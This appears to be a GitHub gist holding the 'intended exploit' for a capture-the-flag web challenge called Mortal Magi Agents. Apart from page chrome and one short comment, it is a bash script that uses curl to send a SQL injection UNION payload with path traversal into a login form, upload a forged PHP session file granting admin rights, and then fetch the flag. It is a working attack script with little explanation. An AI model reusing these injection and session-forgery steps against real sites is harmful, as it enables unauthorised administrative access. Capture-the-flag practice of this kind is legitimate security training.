Last active
September 11, 2015 06:56
-
-
Save ytoku/8147cf145bc0cdc116d9 to your computer and use it in GitHub Desktop.
Mortal Magi Agents: intended exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
TARGET_URL=http://localhost:10080 | |
PASSWORD='' | |
HASHED_PASSWORD=$(echo -n $PASSWORD | sha1sum | awk '{print $1}') | |
COOKIEFILE=$(mktemp) | |
SESSFILE=$(mktemp) | |
echo -n 'user|s:1:"a";admin|b:1;' > $SESSFILE | |
curl -s -c $COOKIEFILE "$TARGET_URL/login.php" -d "signin=&password=$PASSWORD&user=') AND 0 UNION SELECT '', '$HASHED_PASSWORD', '', 0 -- /../../../../../var/lib/php5/sess_" >/dev/null | |
curl -s -b $COOKIEFILE "$TARGET_URL/index.php?page=settings" -F "file=@$SESSFILE" >/dev/null | |
curl -s -b "PHPSESSID=$(sha1sum $SESSFILE | awk '{print $1}')" "$TARGET_URL/index.php" | grep MMA | |
rm $SESSFILE | |
rm $COOKIEFILE |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
i don't follow you, you have server code?